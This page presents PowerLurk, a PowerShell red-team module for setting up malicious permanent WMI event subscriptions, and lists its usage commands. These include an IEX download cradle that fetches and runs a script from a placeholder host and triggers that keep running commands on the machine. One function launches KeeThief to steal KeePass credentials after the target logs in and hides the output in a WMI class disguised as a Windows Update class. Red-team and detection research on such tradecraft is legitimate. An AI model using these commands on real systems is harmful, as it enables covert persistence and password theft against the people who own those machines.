PowerLurk - Malicious WMI Events using PowerShell.

PowerLurk – Malicious WMI Events using PowerShell.

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:
1. Import locally:
PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1

2. Download Cradle:
PS> powershell.exe -NoP -C “IEX (New-Object Net.WebClient).DownloadString(‘http://<IP>/PowerLurk.ps1’); Get-WmiEvent”

+ Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
1. Return all active WMI event objects with the name ‘RedTeamEvent’
Get-WmiEvent -Name RedTeamEvent

2. Delete ‘RedTeamEvent’ WMI event objects
Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject

+ Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
1. Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts
Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe

2. Cleanup Malicious WMI Event

Get-WmiEvent -Name LogNotepad | Remove-WmiObject

+ Add-KeeThiefLurker

creates a permanent WMI event that will execute KeeThief (See @Harmj0y’s KeeThief at https://github.com/adaptivethreat/KeeThief) 4 minutes after the ‘keepass’ process starts. This gives the target time to log into their KeePass database.

Example Query custom WMI class

Example Query custom WMI class

The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by ‘Everyone’. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
1 Add KeeThiefLurker event using WMI class storage
Add-KeeThiefLurker -EventName KeeThief -WMI

2. Query custom WMI class
Get-WmiObject -Namespace root\software win32_WindowsUpdate -List

3. Extract KeeThief output from WMI class
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties[‘Output’].value))

4. Cleanup KeeThiefLurker
Remove-KeeThiefLurker -EventName KeeThief -WMI

Download: PowerLurk.zip
Source: https://github.com/Sw4mpf0x